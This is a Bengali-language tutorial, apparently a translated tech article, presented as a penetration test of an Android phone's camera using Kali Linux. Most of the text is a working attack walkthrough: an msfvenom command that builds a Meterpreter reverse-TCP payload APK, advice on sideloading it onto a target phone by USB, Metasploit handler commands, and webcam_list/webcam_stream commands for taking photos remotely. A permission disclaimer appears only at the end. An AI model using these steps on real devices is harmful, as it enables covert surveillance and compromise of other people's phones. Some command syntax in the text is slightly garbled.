কম্পিউটার

কালি লিনাক্স ব্যবহার করে অ্যান্ড্রয়েড ফোন ক্যামেরায় কীভাবে অনুপ্রবেশ পরীক্ষা চালাবেন

কালি লিনাক্স ব্যবহার করে অ্যান্ড্রয়েড ফোন ক্যামেরায় কীভাবে অনুপ্রবেশ পরীক্ষা চালাবেন

হ্যাকাররা তাদের ব্যবহারকারীদের কাছ থেকে লুকিয়ে রাখার জন্য অ্যান্ড্রয়েড ফোনের ক্যামেরা ছিনতাই করে বা তাদের জাল ছবি সরবরাহ করার বেশ কয়েকটি খবর পাওয়া গেছে। একজন সতর্ক ফোনের মালিক হিসাবে, আপনি হয়ত এই ধরনের হুমকি ইভেন্টের সম্ভাবনা এবং সত্যিকারের ঝুঁকি মূল্যায়ন করে এটি প্রতিরোধ করতে চাইছেন।

একটি অনুপ্রবেশ পরীক্ষার মাধ্যমে আপনার অ্যান্ড্রয়েড ফোন ক্যামেরার সম্ভাব্য দুর্বলতাগুলি পরীক্ষা করার জন্য কালি লিনাক্স হল অন্যতম সেরা সরঞ্জাম। এটি আপনাকে ফোন ক্যামেরা দূরবর্তীভাবে অ্যাক্সেস করার যেকোনো হ্যাকার প্রচেষ্টার শীর্ষে থাকতে সাহায্য করতে পারে।

একটি এক্সপ্লয়েট পেলোড ইনস্টল করা

একটি অনুপ্রবেশ পরীক্ষার জন্য কালি লিনাক্স ব্যবহার করতে, প্রথমে এটির অফিসিয়াল সাইট থেকে ডাউনলোড করুন। “msfvenom,” “msfconsole,” “meterpreter” এবং আরও অনেক কিছুর সংজ্ঞার জন্য এই আগের টিউটোরিয়ালটি পড়ুন যা এই অনুশীলনে ব্যবহার করা হবে।

অনুপ্রবেশ পরীক্ষার প্রথম ধাপ হল ডিভাইসে একটি স্ট্যান্ডার্ড এক্সপ্লয়েট পেলোড ইনস্টল করা। এর জন্য, কালি লিনাক্স টার্মিনাল খুলুন এবং নিম্নলিখিত কমান্ডটি লিখুন:ifconfig . এটি আপনাকে আপনার কালি লিনাক্স সেশনের আইপি ঠিকানা দেবে।

কালি লিনাক্স ব্যবহার করে অ্যান্ড্রয়েড ফোন ক্যামেরায় কীভাবে অনুপ্রবেশ পরীক্ষা চালাবেন

এখন উপরের আইপি ঠিকানাটি ব্যবহার করে নীচে দেখানো কমান্ডটি প্রবেশ করুন। শোষণ, ট্রোজান এবং অন্যান্য দুর্বলতার জন্য পোর্ট নম্বর সাধারণত 4444 হিসাবে দেওয়া হয়।

msfvenom - p android/meterpreter/reverse_tcp L HOST=IP address LPORT=Number R > Payload.apk

এই ধাপে একটি মেটাসপ্লয়েট পেলোড ইনজেক্ট করার চেষ্টা করুন, যা একটি জাভা ইন্টারপ্রেটারের উপর ভিত্তি করে। সফল হলে, অনুপ্রবেশ পরীক্ষা আপনাকে যাচাই করতে সাহায্য করবে যে আপনার ফোন ফোন কল শোনা, SMS অ্যাক্সেস করা, ব্যবহারকারীর ভূ-লোকেটিং ইত্যাদির জন্য দুর্বল কিনা।

এই ক্ষেত্রে ফোনের ক্যামেরা অ্যাক্সেস করার জন্য কীভাবে শোষণকে ব্যবহার করা যেতে পারে তা দেখানোর চেষ্টা করা হয়।

কালি লিনাক্স ব্যবহার করে অ্যান্ড্রয়েড ফোন ক্যামেরায় কীভাবে অনুপ্রবেশ পরীক্ষা চালাবেন

একবার শোষণ শুরু হলে, রুট ফোল্ডারে "পেলোড" নামে একটি APK ফাইল ইনস্টল করা হবে। আপনি একটি লক্ষ্য Android ফোনে এটি ইনস্টল করতে হবে. যাইহোক, এটি সম্পন্ন করার চেয়ে বলা সহজ। বেশিরভাগ নতুন অ্যান্ড্রয়েড ফোন এবং ইমেল এই ধরনের ম্যালওয়্যার সংক্রামিত ফাইল বহন করতে অস্বীকার করবে, এবং এটি একটি ভাল জিনিস।

যাইহোক, এটি এখনও একটি USB কেবল বা অস্থায়ী ফাইলের মাধ্যমে অর্জন করা যেতে পারে। যদি কোনো হ্যাকার আপনার ফোনে কয়েক মিনিটের জন্য অ্যাক্সেস থাকে, তাহলে এটি কিছুটা দুর্বল হয়ে পড়ে। এই অনুপ্রবেশ পরীক্ষায় এখানে আমাদের প্রচেষ্টা জড়িত ঝুঁকির সুনির্দিষ্ট পরিমাণ নির্ধারণ করা।

কালি লিনাক্স ব্যবহার করে অ্যান্ড্রয়েড ফোন ক্যামেরায় কীভাবে অনুপ্রবেশ পরীক্ষা চালাবেন

একবার স্থানান্তরিত হলে, আপনাকে আপনার ফোনে পেলোড ফাইল ইনস্টল করার একটি উপায় খুঁজে বের করতে হবে। এটি একটি খুব পুরানো অ্যান্ড্রয়েড সংস্করণ না হলে, APK ইনস্টল করার আগে আপনার ফোনে আপনাকে বেশ কয়েকটি সতর্কতা দেওয়া উচিত। তবুও, অ্যান্ড্রয়েড ফোন সংস্করণ যাই হোক না কেন, একটি অ্যান্ড্রয়েড ফোনে অজানা উত্স থেকে অ্যাপগুলি ইনস্টল করার আরও অনেক উপায় রয়েছে৷

কালি লিনাক্স ব্যবহার করে অ্যান্ড্রয়েড ফোন ক্যামেরায় কীভাবে অনুপ্রবেশ পরীক্ষা চালাবেন

শোষণ চালু করা হচ্ছে

উপরের পেলোড শোষণ চালু করতে, নিম্নলিখিত কমান্ডটি প্রবেশ করান:msfconsole . কমান্ডটি কার্যকর হতে মাত্র কয়েক সেকেন্ড সময় লাগবে এবং ফোনের ক্যামেরায় আরও অনুপ্রবেশ পরীক্ষার জন্য মেটাসপ্লয়েট প্রস্তুত করা যেতে পারে।

কালি লিনাক্স ব্যবহার করে অ্যান্ড্রয়েড ফোন ক্যামেরায় কীভাবে অনুপ্রবেশ পরীক্ষা চালাবেন

মেটাস্প্লয়েট তার নিজস্ব সম্পূর্ণ বিবরণ দেবে। পেলোড সারাংশও দৃশ্যমান। এটি কর্মক্ষেত্রে শোষণের সংখ্যা দেখায়।

কালি লিনাক্স ব্যবহার করে অ্যান্ড্রয়েড ফোন ক্যামেরায় কীভাবে অনুপ্রবেশ পরীক্ষা চালাবেন

পরবর্তী ধাপে msfconsole শোষণ চালু করতে প্রস্তুত। এর জন্য, আগে আলোচিত IP ঠিকানা এবং পোর্ট নম্বর (4444) দেখুন। তদনুসারে, নিম্নলিখিত কমান্ডগুলি লিখুন:

exploit (multi/handler) > set LHOST "IP Address" [ENTER]
set LPORT "Port number" [ENTER]
exploit [ENTER]
কালি লিনাক্স ব্যবহার করে অ্যান্ড্রয়েড ফোন ক্যামেরায় কীভাবে অনুপ্রবেশ পরীক্ষা চালাবেন

যখন বিপরীত TCP হ্যান্ডলার সক্রিয় করা হয়, তখন আপনি মিটারপ্রেটার নিজেই চালু হওয়ার বিভিন্ন ধাপ দেখতে পাবেন। এটি লক্ষ্য ফোন নির্ণয় করার সময় কয়েক সেকেন্ডের জন্য অপেক্ষা করুন.

এখানে উল্লেখ করা দরকার যে বেশিরভাগ আধুনিক অ্যান্ড্রয়েড ফোনগুলি এই অ্যাক্সেস অস্বীকার করতে থাকবে। মনে রাখবেন এটি একটি অনুপ্রবেশ পরীক্ষা। যদি আপনার অ্যান্ড্রয়েড ফোনটি এই প্রাণঘাতী APK ফাইলটি ব্যবহার করে অনুপ্রবেশ করা না যায়, তাহলে এর অর্থ হল আপনার ফোন নির্মাতা এই বিশেষ আক্রমণ ভেক্টর সম্পর্কে সচেতন।

কালি লিনাক্স ব্যবহার করে অ্যান্ড্রয়েড ফোন ক্যামেরায় কীভাবে অনুপ্রবেশ পরীক্ষা চালাবেন

অ্যান্ড্রয়েড ফোনের ক্যামেরা অ্যাক্সেস করা

আপনি সফলভাবে ফোনে শোষণ সন্নিবেশ করতে সক্ষম হলে, এটি এখন অনুপ্রবেশ করা যেতে পারে একটি সুযোগ আছে. যখন এটি ঘটবে, একটি কালি লিনাক্স টার্মিনালের "মিটারপ্রেটার" ফোনের সাথে একটি সংযোগ স্থাপন করতে সক্ষম হবে৷ এই সময়ে, help ঢোকান আক্রমণের অধীনে অ্যান্ড্রয়েড ফোনের মধ্যে একাধিক বিকল্প অ্যাক্সেস করতে।

কালি লিনাক্স ব্যবহার করে অ্যান্ড্রয়েড ফোন ক্যামেরায় কীভাবে অনুপ্রবেশ পরীক্ষা চালাবেন

আপনার ফোনের ক্যামেরা অ্যাক্সেস করতে নিম্নলিখিত কমান্ডগুলি লিখুন (হেল্প মেনু থেকে)। এই শোষণে টার্মিনাল থেকে ছবি তোলার জন্য পিছনের ক্যামেরা অ্যাক্সেস করার চেষ্টা করা হয়েছিল।

webcam_list [ENTER]
1. Back camera
2. Front camera [ENTER]
webcam_stream -i 1

একটি সফল অনুপ্রবেশ পরীক্ষা সম্পূর্ণ করতে, একবার আপনি ক্যামেরা অ্যাক্সেস করতে সক্ষম হলে, একটি ছবি তুলুন এবং এটি কালি লিনাক্স রুট ফোল্ডারে সংরক্ষণ করুন। এছাড়াও আপনি সংরক্ষিত অন্যান্য ছবি সম্পাদনা, পুনঃনামকরণ বা মুছে ফেলতে পারেন। অতএব, পরীক্ষিত ফোনে যেকোন সফল অনুপ্রবেশ একটি সত্যিকারের আক্রমণের সম্ভাবনার উপর একটি ওয়েক-আপ কল, যার মানে এটি একটি নিরাপত্তা প্যাচের জন্য যাওয়ার সময়।

কালি লিনাক্স ব্যবহার করে অ্যান্ড্রয়েড ফোন ক্যামেরায় কীভাবে অনুপ্রবেশ পরীক্ষা চালাবেন

এই টিউটোরিয়ালে আপনি শিখেছেন কীভাবে একটি কালি লিনাক্স টার্মিনাল থেকে পেনিট্রেশন পরীক্ষার জন্য অ্যান্ড্রয়েড ক্যামেরা অ্যাক্সেস করা যায়।

এটি একটি নিরাপত্তা গবেষণা নিবন্ধ. আপনি যদি কোনও প্রদর্শনের জন্য অন্য কারও ক্যামেরা অ্যাক্সেস করেন তবে সর্বদা প্রথমে তাদের অনুমতি নিন - যদি না, অবশ্যই, এটি আপনার নিজের ফোন। আপনার ফোনের দুর্বলতাগুলি পরীক্ষা করতে এবং খুঁজে পেতে সহায়তা করার জন্য অ্যান্ড্রয়েডের জন্য এই হ্যাকিং অ্যাপগুলি দেখতে ভুলবেন না


  1. লিনাক্স ডিপ্লয় ব্যবহার করে আপনার অ্যান্ড্রয়েড ফোনে কীভাবে উবুন্টু ইনস্টল করবেন

  2. কীভাবে একটি অ্যান্ড্রয়েড ফোনে দুটি স্ন্যাপচ্যাট অ্যাকাউন্ট চালাবেন?

  3. কিভাবে WSL ব্যবহার করে Windows 10 এবং 11 এ লিনাক্স অ্যাপ চালাবেন

  4. কিভাবে Android-x86 দিয়ে লিনাক্সে অ্যান্ড্রয়েড গেম চালাবেন